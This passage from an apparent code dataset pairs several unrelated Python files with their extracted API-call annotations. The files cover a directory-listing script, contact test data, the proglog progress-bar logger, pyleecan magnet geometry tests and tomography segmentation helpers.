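vivEventsToFile(path, events)
assert vivEventsFromFile(path) == events
```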
import glob
from os import walk

exclude_folders = [
    'node_modules',
    'ios',
    'android',
    '__pycache__'
]

exclude_files = [
    'json',
    'txt',
    'traineddata',
    'lstmf',
    'yml',
    'md',
    'log',
    'env',
    'gitignore',
    'dockerignore'
]

# get all files in directory
dirr = '/home/viktor/Documents/personal-expenses-accounting/app/services/web_service/'
folders = glob.glob(dirr + '/**/', recursive=True)

# only app related directories
directories = []
for folder in folders:
    current_folder = folder.split('/')[-2]
    if current_folder not in exclude_folders:
        files = glob.glob(folder + '*')
        print(files)
        directories.append(folder)

# num_lines = sum(1 for line in open('myfile.txt'))
| [
"glob.glob"
]
| [((400, 440), 'glob.glob', 'glob.glob', (["(dirr + '/**/')"], {'recursive': '(True)'}), "(dirr + '/**/', recursive=True)\n", (409, 440), False, 'import glob\n'), ((618, 641), 'glob.glob', 'glob.glob', (["(folder + '*')"], {}), "(folder + '*')\n", (627, 641), False, 'import glob\n')] |
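The trailing comment in the row above hints at counting lines per file. A hedged continuation under the same assumptions (same `dirr` layout, plain-text files only) could look like this:

```python
# Hypothetical continuation: total line count over the collected app files.
total_lines = 0
for folder in directories:
    for path in glob.glob(folder + '*'):
        ext = path.rsplit('.', 1)[-1]
        if ext in exclude_files:
            continue
        try:
            with open(path) as f:
                total_lines += sum(1 for _ in f)
        except (IsADirectoryError, UnicodeDecodeError):
            continue  # skip sub-directories and binary files
print(total_lines)
```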
from models.contact import Contact
testdata = [Contact(first_name="Firstname", last_name="Lastname", mobile_phone="+12345678",
work_phone="12345", home_phone="67890", fax="55443322", email_1="<EMAIL>",
email_2="<EMAIL>", email_3="<EMAIL>",
address="Street, 15 \n 12345 New-York")]
| [
"models.contact.Contact"
]
| [((49, 298), 'models.contact.Contact', 'Contact', ([], {'first_name': '"""Firstname"""', 'last_name': '"""Lastname"""', 'mobile_phone': '"""+12345678"""', 'work_phone': '"""12345"""', 'home_phone': '"""67890"""', 'fax': '"""55443322"""', 'email_1': '"""<EMAIL>"""', 'email_2': '"""<EMAIL>"""', 'email_3': '"""<EMAIL>"""', 'address': '"""Street, 15 \n 12345 New-York"""'}), '(first_name=\'Firstname\', last_name=\'Lastname\', mobile_phone=\n \'+12345678\', work_phone=\'12345\', home_phone=\'67890\', fax=\'55443322\',\n email_1=\'<EMAIL>\', email_2=\'<EMAIL>\', email_3=\'<EMAIL>\', address=\n """Street, 15 \n 12345 New-York""")\n', (56, 298), False, 'from models.contact import Contact\n')] |
"""Implements the generic progress logger class, and the ProgressBar class.
"""
from tqdm import tqdm, tqdm_notebook
from collections import OrderedDict
import time
SETTINGS = {
'notebook': False
}
def notebook(turn='on'):
SETTINGS['notebook'] = True if (turn == 'on') else False
def troncate_string(s, max_length=25):
return s if (len(s) < max_length) else (s[:max_length] + "...")
class ProgressLogger:
"""Generic class for progress loggers.
A progress logger contains a "state" dictionnary.
Parameters
----------
init_state
Dictionnary representing the initial state.
"""
def __init__(self, init_state=None):
self.state = {}
self.stored = {}
self.logs = []
self.log_indent = 0
if init_state is not None:
self.state.update(init_state)
def log(self, message):
self.logs.append((' ' * self.log_indent) + message)
def dump_logs(self, filepath=None):
if filepath is not None:
with open(filepath, 'a') as f:
f.write("\n".join(self.logs))
else:
return "\n".join(self.logs)
def callback(self, **kw):
"""Execute something after the state has been updated by the given
state elements.
This default callback does nothing, overwrite it by subclassing
"""
pass
def store(self, **kw):
"""Store objects in the logger and trigger ``self.store_callback``.
This works exactly like ``logger()``, but the later is meant for simple
data objects (text, numbers) that will be sent over the network or
written to a file. The ``store`` method expects rather large objects
which are not necessarily serializable, and will be used eg to draw
plots on the fly.
"""
self.stored.update(kw)
self.store_callback(**kw)
def store_callback(self, **kw):
"""Execute something after the store has been updated by the given
state elements.
This default callback does nothing, overwrite it by subclassing
"""
pass
def iter(self, **kw):
"""Iterate through a list while updating the state.
Examples
--------
>>> for username in logger.iter(user=['tom', 'tim', 'lea']):
>>> # At every loop, logger.state['user'] is updated
>>> print (username)
"""
for field, iterable in kw.items():
for it in iterable:
self(**{field: it})
yield it
def __call__(self, **kw):
self.state.update(kw)
self.callback(**kw)
class ProgressBarLogger(ProgressLogger):
"""Generic class for progress loggers.
A progress logger contains a "state" dictionnary
Parameters
----------
init_state
Initial state of the logger
bars
Either None (will be initialized with no bar) or a list/tuple of bar
names (``['main', 'sub']``) which will be initialized with index -1 and
no total, or a dictionary (possibly ordered) of bars, of the form
``{bar_1: {title: 'bar1', index: 2, total:23}, bar_2: {...}}``
ignored_bars
Either None (newly met bars will be added) or a list of blacklisted bar
names, or ``'all_others'`` to signify that all bar names not already in
``self.bars`` will be ignored.
"""
bar_indent = 2
def __init__(self, init_state=None, bars=None, ignored_bars=None,
logged_bars='all', min_time_interval=0, ignore_bars_under=0):
ProgressLogger.__init__(self, init_state)
if bars is None:
bars = OrderedDict()
elif isinstance(bars, (list, tuple)):
bars = OrderedDict([
(b, dict(title=b, index=-1, total=None, message=None,
indent=0))
for b in bars
])
if isinstance(ignored_bars, (list, tuple)):
ignored_bars = set(ignored_bars)
self.ignored_bars = ignored_bars
self.logged_bars = logged_bars
self.state['bars'] = bars
self.min_time_interval = min_time_interval
self.ignore_bars_under = ignore_bars_under
@property
def bars(self):
"""Return ``self.state['bars'].``"""
return self.state['bars']
def bar_is_ignored(self, bar):
if self.ignored_bars is None:
return False
elif self.ignored_bars == 'all_others':
return (bar not in self.bars)
else:
return bar in self.ignored_bars
def bar_is_logged(self, bar):
if (not self.logged_bars):
return False
elif self.logged_bars == 'all':
return True
else:
return bar in self.logged_bars
def iterable_is_too_short(self, iterable):
length = len(iterable) if hasattr(iterable, '__len__') else None
return (length is not None) and (length < self.ignore_bars_under)
def iter_bar(self, bar_prefix='', **kw):
"""Iterate through a list while updating a state bar.
Examples
--------
>>> for username in logger.iter_bar(user=['tom', 'tim', 'lea']):
>>> # At every loop, logger.state['bars']['user'] is updated
>>> # to {index: i, total: 3, title:'user'}
>>> print (username)
"""
if 'bar_message' in kw:
bar_message = kw.pop('bar_message')
else:
bar_message = None
bar, iterable = kw.popitem()
if self.bar_is_ignored(bar) or self.iterable_is_too_short(iterable):
return iterable
bar = bar_prefix + bar
if hasattr(iterable, '__len__'):
self(**{bar + '__total': len(iterable)})
def new_iterable():
last_time = time.time()
i = 0 # necessary in case the iterator is empty
for i, it in enumerate(iterable):
now_time = time.time()
if (i == 0) or (now_time - last_time > self.min_time_interval):
if bar_message is not None:
self(**{bar + '__message': bar_message(it)})
self(**{bar + '__index': i})
last_time = now_time
yield it
if self.bars[bar]['index'] != i:
self(**{bar + '__index': i})
self(**{bar + '__index': i + 1})
return new_iterable()
def bars_callback(self, bar, attr, value, old_value=None):
"""Execute a custom action after the progress bars are updated.
Parameters
----------
bar
Name/ID of the bar to be modified.
attr
Attribute of the bar attribute to be modified
value
New value of the attribute
old_value
Previous value of this bar's attribute.
This default callback does nothing, overwrite it by subclassing.
"""
pass
def __call__(self, **kw):
items = sorted(kw.items(), key=lambda kv: not kv[0].endswith('total'))
for key, value in items:
if '__' in key:
bar, attr = key.split('__')
if self.bar_is_ignored(bar):
continue
kw.pop(key)
if bar not in self.bars:
self.bars[bar] = dict(title=bar, index=-1,
total=None, message=None)
old_value = self.bars[bar][attr]
if self.bar_is_logged(bar):
new_bar = (attr == 'index') and (value < old_value)
if (attr == 'total') or (new_bar):
self.bars[bar]['indent'] = self.log_indent
else:
self.log_indent = self.bars[bar]['indent']
self.log("[%s] %s: %s" % (bar, attr, value))
self.log_indent += self.bar_indent
self.bars[bar][attr] = value
self.bars_callback(bar, attr, value, old_value)
self.state.update(kw)
self.callback(**kw)
class TqdmProgressBarLogger(ProgressBarLogger):
"""Tqdm-powered progress bar for console or Notebooks.
Parameters
----------
init_state
Initial state of the logger
bars
Either None (will be initialized with no bar) or a list/tuple of bar
names (``['main', 'sub']``) which will be initialized with index -1 and
no total, or a dictionary (possibly ordered) of bars, of the form
``{bar_1: {title: 'bar1', index: 2, total:23}, bar_2: {...}}``
ignored_bars
Either None (newly met bars will be added) or a list of blacklisted bar
names, or ``'all_others'`` to signify that all bar names not already in
``self.bars`` will be ignored.
leave_bars
notebook
True will make the bars look nice (HTML) in the jupyter notebook. It is
advised to leave to 'default' as the default can be globally set from
inside a notebook with ``import proglog; proglog.notebook_mode()``.
print_messages
If True, every ``logger(message='something')`` will print a message in
the console / notebook
"""
def __init__(self, init_state=None, bars=None, leave_bars=False,
ignored_bars=None, logged_bars='all', notebook='default',
print_messages=True, min_time_interval=0,
ignore_bars_under=0):
ProgressBarLogger.__init__(self, init_state=init_state, bars=bars,
ignored_bars=ignored_bars,
logged_bars=logged_bars,
ignore_bars_under=ignore_bars_under,
min_time_interval=min_time_interval)
self.leave_bars = leave_bars
self.tqdm_bars = OrderedDict([
(bar, None)
for bar in self.bars
])
if notebook == 'default':
notebook = SETTINGS['notebook']
self.notebook = notebook
self.print_messages = print_messages
self.tqdm = (tqdm_notebook if self.notebook else tqdm)
def new_tqdm_bar(self, bar):
"""Create a new tqdm bar, possibly replacing an existing one."""
if (bar in self.tqdm_bars) and (self.tqdm_bars[bar] is not None):
self.close_tqdm_bar(bar)
infos = self.bars[bar]
self.tqdm_bars[bar] = self.tqdm(
total=infos['total'],
desc=infos['title'],
postfix=dict(now=troncate_string(str(infos['message']))),
leave=self.leave_bars
)
def close_tqdm_bar(self, bar):
"""Close and erase the tqdm bar"""
self.tqdm_bars[bar].close()
if not self.notebook:
self.tqdm_bars[bar] = None
def bars_callback(self, bar, attr, value, old_value):
if (bar not in self.tqdm_bars) or (self.tqdm_bars[bar] is None):
self.new_tqdm_bar(bar)
if attr == 'index':
if value >= old_value:
total = self.bars[bar]['total']
if total and (value >= total):
self.close_tqdm_bar(bar)
else:
self.tqdm_bars[bar].update(value - old_value)
else:
self.new_tqdm_bar(bar)
self.tqdm_bars[bar].update(value + 1)
elif attr == 'message':
self.tqdm_bars[bar].set_postfix(now=troncate_string(str(value)))
self.tqdm_bars[bar].update(0)
def callback(self, **kw):
if self.print_messages and ('message' in kw) and kw['message']:
if self.notebook:
print(kw['message'])
else:
self.tqdm.write(kw['message'])
class RqWorkerProgressLogger:
def __init__(self, job):
self.job = job
if 'progress_data' not in self.job.meta:
self.job.meta['progress_data'] = {}
self.job.save()
def callback(self, **kw):
self.job.meta['progress_data'] = self.state
self.job.save()
class RqWorkerBarLogger(RqWorkerProgressLogger, ProgressBarLogger):
def __init__(self, job, init_state=None, bars=None, ignored_bars=(),
logged_bars='all', min_time_interval=0):
RqWorkerProgressLogger.__init__(self, job)
ProgressBarLogger.__init__(self, init_state=init_state, bars=bars,
ignored_bars=ignored_bars,
logged_bars=logged_bars,
min_time_interval=min_time_interval)
class MuteProgressBarLogger(ProgressBarLogger):
def bar_is_ignored(self, bar):
return True
def default_bar_logger(logger, bars=None, ignored_bars=None, logged_bars='all',
min_time_interval=0, ignore_bars_under=0):
if logger == 'bar':
return TqdmProgressBarLogger(
bars=bars,
ignored_bars=ignored_bars,
logged_bars=logged_bars,
min_time_interval=min_time_interval,
ignore_bars_under=ignore_bars_under
)
elif logger is None:
return MuteProgressBarLogger()
else:
return logger
| [
"collections.OrderedDict",
"time.time"
]
| [((9891, 9938), 'collections.OrderedDict', 'OrderedDict', (['[(bar, None) for bar in self.bars]'], {}), '([(bar, None) for bar in self.bars])\n', (9902, 9938), False, 'from collections import OrderedDict\n'), ((3666, 3679), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3677, 3679), False, 'from collections import OrderedDict\n'), ((5832, 5843), 'time.time', 'time.time', ([], {}), '()\n', (5841, 5843), False, 'import time\n'), ((5977, 5988), 'time.time', 'time.time', ([], {}), '()\n', (5986, 5988), False, 'import time\n')] |
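The `iter_bar` docstring above already sketches the intended usage; here is a short, self-contained example (console tqdm bar, made-up work loop), assuming the module above is installed as `proglog`:

```python
import time
from proglog import default_bar_logger  # assumption: module importable as proglog

logger = default_bar_logger('bar')        # returns a TqdmProgressBarLogger
for chunk in logger.iter_bar(chunk=range(100)):
    time.sleep(0.01)                      # stand-in for real work
logger(message='done')
```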
# -*- coding: utf-8 -*-
"""
@date Created on Thu Dec 18 13:56:33 2014
@copyright (C) 2014-2015 EOMYS ENGINEERING.
@author pierre_b
"""
from unittest import TestCase
from ddt import ddt, data
from pyleecan.Classes.Arc1 import Arc1
from pyleecan.Classes.Segment import Segment
from pyleecan.Classes.MagnetType11 import MagnetType11
from pyleecan.Classes.LamSlotMag import LamSlotMag
from pyleecan.Classes.SlotMPolar import SlotMPolar
from numpy import pi, exp, angle, array
from pyleecan.Methods.Machine.Magnet.comp_surface import comp_surface
Mag11_test = list()
# Internal Slot surface
lam = LamSlotMag(is_internal=True, Rext=0.5)
lam.slot = SlotMPolar(H0=0, W0=pi / 4, Zs=4)
lam.slot.magnet = [MagnetType11(Hmag=1, Wmag=pi / 4)]
Mag11_test.append({"test_obj": lam, "S_exp": 0.78539616, "Ao": pi / 4, "H_exp": 1})
# Internal Slot inset
lam = LamSlotMag(is_internal=True, Rext=0.5)
lam.slot = SlotMPolar(H0=40e-3, W0=pi / 4, Zs=4)
lam.slot.magnet = [MagnetType11(Hmag=20e-3, Wmag=pi / 4)]
Mag11_test.append({"test_obj": lam, "S_exp": 7.3827e-3, "Ao": pi / 4, "H_exp": 20e-3})
# Outward Slot inset
lam = LamSlotMag(is_internal=False, Rext=0.1325)
lam.slot = SlotMPolar(H0=5e-3, W0=pi / 10, Zs=8)
lam.slot.magnet = [MagnetType11(Hmag=8e-3, Wmag=pi / 12)]
Mag11_test.append({"test_obj": lam, "S_exp": 2.09439e-6, "Ao": pi / 12, "H_exp": 8e-3})
# For AlmostEqual
DELTA = 1e-4
@ddt
class test_Magnet_Type_11_meth(TestCase):
"""unittest for MagnetType11 methods
"""
@data(*Mag11_test)
def test_comp_surface(self, test_dict):
"""Check that the computation of the surface is correct
"""
test_obj = test_dict["test_obj"]
result = test_obj.slot.magnet[0].comp_surface()
a = result
b = test_dict["S_exp"]
msg = "Return " + str(a) + " expected " + str(b)
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)
# Compare numerical and analytical results
b = comp_surface(test_obj.slot.magnet[0])
msg = "Analytical: " + str(a) + " Numerical " + str(b)
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)
@data(*Mag11_test)
def test_comp_height(self, test_dict):
"""Check that the computation of the height is correct
"""
test_obj = test_dict["test_obj"]
result = test_obj.slot.magnet[0].comp_height()
a = result
b = test_dict["H_exp"]
msg = "Return " + str(a) + " expected " + str(b)
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)
@data(*Mag11_test)
def test_comp_angle_op(self, test_dict):
"""Check that the computation of the opening angle is correct
"""
test_obj = test_dict["test_obj"]
result = test_obj.slot.magnet[0].comp_angle_opening()
a = result
b = test_dict["Ao"]
msg = "Return " + str(a) + " expected " + str(b)
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)
def test_build_geometry_out(self):
"""check that curve_list is correct (outwards magnet)"""
lam = LamSlotMag(
Rint=40e-3,
Rext=90e-3,
is_internal=False,
is_stator=False,
L1=0.45,
Nrvd=1,
Wrvd=0.05,
)
magnet = [MagnetType11(Wmag=pi / 10, Hmag=0.2)]
lam.slot = SlotMPolar(Zs=8, W0=pi / 10, H0=0.2, magnet=magnet)
test_obj = lam.slot.magnet[0]
Z1 = (40e-3 + 0.2) * exp(-1j * pi / 10 / 2)
Z2 = (40e-3 + 0.2) * exp(1j * pi / 10 / 2)
Z = abs(Z1)
Z3 = (Z - 0.2) * exp(1j * angle(Z1))
Z4 = (Z - 0.2) * exp(1j * angle(Z2))
# # Creation of curve
curve_list = list()
curve_list.append(Segment(Z1, Z3))
curve_list.append(Arc1(Z3, Z4, abs(Z3)))
curve_list.append(Segment(Z4, Z2))
curve_list.append(Arc1(Z2, Z1, -abs(Z2)))
surface = test_obj.build_geometry()
result = surface[0].get_lines()
for i in range(0, len(result)):
a = result[i].begin
b = curve_list[i].begin
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA)
a = result[i].end
b = curve_list[i].end
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA)
def test_build_geometry_in(self):
"""check that curve_list is correct (inwards magnet)"""
lam = LamSlotMag(
Rint=40e-1,
Rext=90e-1,
is_internal=True,
is_stator=False,
L1=0.45,
Nrvd=1,
Wrvd=0.05,
)
magnet = [MagnetType11(Wmag=pi / 10, Hmag=0.2)]
lam.slot = SlotMPolar(Zs=8, W0=pi / 10, H0=0.2, magnet=magnet)
test_obj = lam.slot.magnet[0]
Z1 = (90e-1 - 0.2) * exp(-1j * pi / 10 / 2)
Z2 = (90e-1 - 0.2) * exp(1j * pi / 10 / 2)
Z = abs(Z1)
Z3 = (Z + 0.2) * exp(1j * angle(Z1))
Z4 = (Z + 0.2) * exp(1j * angle(Z2))
# # Creation of curve
curve_list = list()
curve_list.append(Segment(Z1, Z3))
curve_list.append(Arc1(Z3, Z4, abs(Z3)))
curve_list.append(Segment(Z4, Z2))
curve_list.append(Arc1(Z2, Z1, -abs(Z2)))
surface = test_obj.build_geometry()
result = surface[0].get_lines()
for i in range(0, len(result)):
a = result[i].begin
b = curve_list[i].begin
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA)
a = result[i].end
b = curve_list[i].end
self.assertAlmostEqual((a - b) / a, 0, delta=DELTA)
| [
"pyleecan.Methods.Machine.Magnet.comp_surface.comp_surface",
"pyleecan.Classes.LamSlotMag.LamSlotMag",
"numpy.angle",
"numpy.exp",
"pyleecan.Classes.Segment.Segment",
"ddt.data",
"pyleecan.Classes.SlotMPolar.SlotMPolar",
"pyleecan.Classes.MagnetType11.MagnetType11"
]
| [((598, 636), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'is_internal': '(True)', 'Rext': '(0.5)'}), '(is_internal=True, Rext=0.5)\n', (608, 636), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((648, 681), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'H0': '(0)', 'W0': '(pi / 4)', 'Zs': '(4)'}), '(H0=0, W0=pi / 4, Zs=4)\n', (658, 681), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((849, 887), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'is_internal': '(True)', 'Rext': '(0.5)'}), '(is_internal=True, Rext=0.5)\n', (859, 887), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((899, 935), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'H0': '(0.04)', 'W0': '(pi / 4)', 'Zs': '(4)'}), '(H0=0.04, W0=pi / 4, Zs=4)\n', (909, 935), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((1110, 1152), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'is_internal': '(False)', 'Rext': '(0.1325)'}), '(is_internal=False, Rext=0.1325)\n', (1120, 1152), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((1164, 1202), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'H0': '(0.005)', 'W0': '(pi / 10)', 'Zs': '(8)'}), '(H0=0.005, W0=pi / 10, Zs=8)\n', (1174, 1202), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((701, 734), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Hmag': '(1)', 'Wmag': '(pi / 4)'}), '(Hmag=1, Wmag=pi / 4)\n', (713, 734), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((956, 992), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Hmag': '(0.02)', 'Wmag': '(pi / 4)'}), '(Hmag=0.02, Wmag=pi / 4)\n', (968, 992), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((1221, 1259), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Hmag': '(0.008)', 'Wmag': '(pi / 12)'}), '(Hmag=0.008, Wmag=pi / 12)\n', (1233, 1259), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((1484, 1501), 'ddt.data', 'data', (['*Mag11_test'], {}), '(*Mag11_test)\n', (1488, 1501), False, 'from ddt import ddt, data\n'), ((2136, 2153), 'ddt.data', 'data', (['*Mag11_test'], {}), '(*Mag11_test)\n', (2140, 2153), False, 'from ddt import ddt, data\n'), ((2551, 2568), 'ddt.data', 'data', (['*Mag11_test'], {}), '(*Mag11_test)\n', (2555, 2568), False, 'from ddt import ddt, data\n'), ((1960, 1997), 'pyleecan.Methods.Machine.Magnet.comp_surface.comp_surface', 'comp_surface', (['test_obj.slot.magnet[0]'], {}), '(test_obj.slot.magnet[0])\n', (1972, 1997), False, 'from pyleecan.Methods.Machine.Magnet.comp_surface import comp_surface\n'), ((3092, 3193), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'Rint': '(0.04)', 'Rext': '(0.09)', 'is_internal': '(False)', 'is_stator': '(False)', 'L1': '(0.45)', 'Nrvd': '(1)', 'Wrvd': '(0.05)'}), '(Rint=0.04, Rext=0.09, is_internal=False, is_stator=False, L1=\n 0.45, Nrvd=1, Wrvd=0.05)\n', (3102, 3193), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((3361, 3412), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'Zs': '(8)', 'W0': '(pi / 10)', 'H0': '(0.2)', 'magnet': 'magnet'}), '(Zs=8, W0=pi / 10, H0=0.2, magnet=magnet)\n', (3371, 3412), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((4413, 4510), 'pyleecan.Classes.LamSlotMag.LamSlotMag', 'LamSlotMag', ([], {'Rint': '(4.0)', 'Rext': '(9.0)', 'is_internal': '(True)', 'is_stator': 
'(False)', 'L1': '(0.45)', 'Nrvd': '(1)', 'Wrvd': '(0.05)'}), '(Rint=4.0, Rext=9.0, is_internal=True, is_stator=False, L1=0.45,\n Nrvd=1, Wrvd=0.05)\n', (4423, 4510), False, 'from pyleecan.Classes.LamSlotMag import LamSlotMag\n'), ((4681, 4732), 'pyleecan.Classes.SlotMPolar.SlotMPolar', 'SlotMPolar', ([], {'Zs': '(8)', 'W0': '(pi / 10)', 'H0': '(0.2)', 'magnet': 'magnet'}), '(Zs=8, W0=pi / 10, H0=0.2, magnet=magnet)\n', (4691, 4732), False, 'from pyleecan.Classes.SlotMPolar import SlotMPolar\n'), ((3304, 3340), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Wmag': '(pi / 10)', 'Hmag': '(0.2)'}), '(Wmag=pi / 10, Hmag=0.2)\n', (3316, 3340), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((3480, 3504), 'numpy.exp', 'exp', (['(-1.0j * pi / 10 / 2)'], {}), '(-1.0j * pi / 10 / 2)\n', (3483, 3504), False, 'from numpy import pi, exp, angle, array\n'), ((3532, 3555), 'numpy.exp', 'exp', (['(1.0j * pi / 10 / 2)'], {}), '(1.0j * pi / 10 / 2)\n', (3535, 3555), False, 'from numpy import pi, exp, angle, array\n'), ((3751, 3766), 'pyleecan.Classes.Segment.Segment', 'Segment', (['Z1', 'Z3'], {}), '(Z1, Z3)\n', (3758, 3766), False, 'from pyleecan.Classes.Segment import Segment\n'), ((3843, 3858), 'pyleecan.Classes.Segment.Segment', 'Segment', (['Z4', 'Z2'], {}), '(Z4, Z2)\n', (3850, 3858), False, 'from pyleecan.Classes.Segment import Segment\n'), ((4624, 4660), 'pyleecan.Classes.MagnetType11.MagnetType11', 'MagnetType11', ([], {'Wmag': '(pi / 10)', 'Hmag': '(0.2)'}), '(Wmag=pi / 10, Hmag=0.2)\n', (4636, 4660), False, 'from pyleecan.Classes.MagnetType11 import MagnetType11\n'), ((4800, 4824), 'numpy.exp', 'exp', (['(-1.0j * pi / 10 / 2)'], {}), '(-1.0j * pi / 10 / 2)\n', (4803, 4824), False, 'from numpy import pi, exp, angle, array\n'), ((4852, 4875), 'numpy.exp', 'exp', (['(1.0j * pi / 10 / 2)'], {}), '(1.0j * pi / 10 / 2)\n', (4855, 4875), False, 'from numpy import pi, exp, angle, array\n'), ((5071, 5086), 'pyleecan.Classes.Segment.Segment', 'Segment', (['Z1', 'Z3'], {}), '(Z1, Z3)\n', (5078, 5086), False, 'from pyleecan.Classes.Segment import Segment\n'), ((5163, 5178), 'pyleecan.Classes.Segment.Segment', 'Segment', (['Z4', 'Z2'], {}), '(Z4, Z2)\n', (5170, 5178), False, 'from pyleecan.Classes.Segment import Segment\n'), ((3610, 3619), 'numpy.angle', 'angle', (['Z1'], {}), '(Z1)\n', (3615, 3619), False, 'from numpy import pi, exp, angle, array\n'), ((3655, 3664), 'numpy.angle', 'angle', (['Z2'], {}), '(Z2)\n', (3660, 3664), False, 'from numpy import pi, exp, angle, array\n'), ((4930, 4939), 'numpy.angle', 'angle', (['Z1'], {}), '(Z1)\n', (4935, 4939), False, 'from numpy import pi, exp, angle, array\n'), ((4975, 4984), 'numpy.angle', 'angle', (['Z2'], {}), '(Z2)\n', (4980, 4984), False, 'from numpy import pi, exp, angle, array\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
from operator import mod
from tomo_encoders.misc.voxel_processing import modified_autocontrast, TimerGPU
from tomo_encoders.reconstruction.recon import recon_patches_3d
import cupy as cp
import numpy as np
from skimage.filters import threshold_otsu
from tomo_encoders import Grid
def get_values_cyl_mask(vol, mask_fac):
vol_shape = vol.shape
assert vol_shape[1] == vol_shape[2], "must be a tomographic volume where shape y = shape x"
shape_yx = vol_shape[1]
shape_z = vol_shape[0]
rad = int(mask_fac*shape_yx/2)
pts = cp.arange(-int(shape_yx//2), int(cp.ceil(shape_yx//2)))
yy, xx = cp.meshgrid(pts, pts, indexing = 'ij')
circ = (cp.sqrt(yy**2 + xx**2) < rad).astype(cp.uint8) # inside is positive
circ = circ[cp.newaxis, ...]
cyl = cp.repeat(circ, shape_z, axis = 0)
return vol[cyl > 0]
def cylindrical_mask(out_vol, mask_fac, mask_val = 0):
vol_shape = out_vol.shape
assert vol_shape[1] == vol_shape[2], "must be a tomographic volume where shape y = shape x"
shape_yx = vol_shape[1]
shape_z = vol_shape[0]
rad = int(mask_fac*shape_yx/2)
pts = cp.arange(-int(shape_yx//2), int(cp.ceil(shape_yx//2)))
yy, xx = cp.meshgrid(pts, pts, indexing = 'ij')
circ = (cp.sqrt(yy**2 + xx**2) < rad).astype(cp.uint8) # inside is positive
circ = circ[cp.newaxis, ...]
cyl = cp.repeat(circ, shape_z, axis = 0)
out_vol[cyl == 0] = mask_val
return
def segment_otsu(vol, s = 0.05):
'''segment volume with otsu'''
timer = TimerGPU()
timer.tic()
tmp_values = vol[::4,::4,::4].get()
# rec_min_max = modified_autocontrast(tmp_values, s = s, normalize_sampling_factor=1)
thresh = cp.float32(threshold_otsu(tmp_values.reshape(-1)))
vol = (vol < thresh).astype(cp.uint8)
timer.toc("otsu thresholding")
return vol
def edge_map(Y):
'''
this algorithm was inspired by: https://github.com/tomochallenge/tomochallenge_utils/blob/master/foam_phantom_utils.py
'''
msk = cp.zeros_like(Y)
tmp = Y[:-1]!=Y[1:]
msk[:-1][tmp] = 1
msk[1:][tmp] = 1
tmp = Y[:,:-1]!=Y[:,1:]
msk[:,:-1][tmp] = 1
msk[:,1:][tmp] = 1
tmp = Y[:,:,:-1]!=Y[:,:,1:]
msk[:,:,:-1][tmp] = 1
msk[:,:,1:][tmp] = 1
return msk > 0
def guess_surface(V_bin, b, wd):
# find patches on surface
wdb = int(wd//b)
p3d = Grid(V_bin.shape, width = wdb)
x = p3d.extract(V_bin)
is_surf = (np.std(x, axis = (1,2,3)) > 0.0)
is_ones = (np.sum(x, axis = (1,2,3))/(wdb**3) == 1)
is_zeros = (np.sum(x, axis = (1,2,3))/(wdb**3) == 0)
p3d = p3d.rescale(b)
p3d_surf = p3d.filter_by_condition(is_surf)
p3d_ones = p3d.filter_by_condition(is_ones)
p3d_zeros = p3d.filter_by_condition(is_zeros)
eff = len(p3d_surf)*(wd**3)/np.prod(p3d_surf.vol_shape)
print(f"\tSTAT: r value: {eff*100.0:.2f}")
return p3d_surf, p3d_ones, p3d_zeros
def process_patches(projs, theta, center, fe, p_surf, min_max, TIMEIT = False):
# SCHEME 1: integrate reconstruction and segmentation (segments data on gpu itself)
# st_proc = cp.cuda.Event(); end_proc = cp.cuda.Event(); st_proc.record()
# x_surf, p_surf = recon_patches_3d(projs, theta, center, p_surf, \
# apply_fbp = True, segmenter = fe, \
# segmenter_batch_size = 256)
# end_proc.record(); end_proc.synchronize(); t_surf = cp.cuda.get_elapsed_time(st_proc,end_proc)
# SCHEME 2: reconstruct and segment separately (copies rec data from gpu to cpu)
st_rec = cp.cuda.Event(); end_rec = cp.cuda.Event(); st_rec.record()
x_surf, p_surf = recon_patches_3d(projs, theta, center, p_surf, \
apply_fbp =True)
end_rec.record(); end_rec.synchronize(); t_rec = cp.cuda.get_elapsed_time(st_rec,end_rec)
st_seg = cp.cuda.Event(); end_seg = cp.cuda.Event(); st_seg.record()
x_surf = np.clip(x_surf, *min_max)
x_surf = fe.predict_patches("segmenter", x_surf[...,np.newaxis], 256, None, min_max = min_max)[...,0]
end_seg.record(); end_seg.synchronize(); t_seg = cp.cuda.get_elapsed_time(st_seg,end_seg)
